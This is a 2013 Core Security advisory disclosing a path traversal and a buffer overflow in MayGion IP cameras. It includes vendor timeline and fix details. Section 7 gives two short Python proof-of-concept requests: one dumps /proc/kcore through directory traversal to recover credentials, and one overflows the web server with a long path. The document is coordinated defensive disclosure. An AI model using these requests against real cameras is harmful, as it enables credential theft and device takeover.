MayGion IP Cameras multiple vulnerabilities

Advisory ID Internal
CORE-2013-0322

1. Advisory Information

Title: MayGion IP Cameras multiple vulnerabilities
Advisory ID: CORE-2013-0322
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: MayGion
Release mode: Coordinated release

2. Vulnerability Information

Class: Path traversal [CWE-22], Buffer overflow [CWE-119]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1604, CVE-2013-1605

3. Vulnerability Description

Multiple vulnerabilities have been found in MayGion IP cameras [1] based on firmware v09.27 and below, that could allow an unauthenticated remote attacker:

  1. [CVE-2013-1604] to dump the camera's memory and retrieve user credentials,
  2. [CVE-2013-1605] to execute arbitrary code.

4. Vulnerable Packages

  • MayGion IP cameras based on firmware 2011.27.09.
  • Other firmware versions are probably affected too but they were not checked.

5. Non-Vulnerable Packages

  • H.264 ipcam firmware 2013.04.22.

6. Credits

These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team.

7. Technical Description / Proof of Concept Code

7.1. User Credentials Leaked via Path Traversal

[CVE-2013-1604] The following Python code exploits a path traversal and dumps the camera's memory. Valid user credentials can be extracted from this memory dump by an unauthenticated remote attacker.

import httplib conn = httplib.HTTPConnection("192.168.100.1") conn.request("GET", "/../../../../../../../../../proc/kcore") resp = conn.getresponse() data = resp.read() conn.close() 

7.2. Buffer overflow

[CVE-2013-1605] The following Python script can be used to trigger the vulnerability without authentication. As a result, the Instruction Pointer register (IP) will be overwritten with 0x61616161, which is a typical buffer overrun condition.

import httplib conn = httplib.HTTPConnection("192.168.100.1") conn.request("GET", "/" + "A" * 3000 + ".html") resp = conn.getresponse() data = resp.read() conn.close() 

8. Report Timeline

  • 2013-05-02: Core Security notifies MayGion of the vulnerabilities. Publication date is set for May 29th, 2013.
  • 2013-05-02: Vendor asks for a report with technical information.
  • 2013-05-03: A draft advisory containing technical details sent to MayGion team.
  • 2013-05-03: Vendor notifies that all vulnerabilities were fixed in the last firmware version, released April 22nd, 2013.
  • 2013-05-09: Core asks for a list of affected devices and firmware. No reply received.
  • 2013-05-28: Advisory CORE-2013-0322 is published.

9. References

[1] http://www.maygion.com

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: www.coresecurity.com/core-labs.

11. About Core Security 

Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. 

12. Disclaimer

The contents of this advisory are copyright (c) 2013 Core Security and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/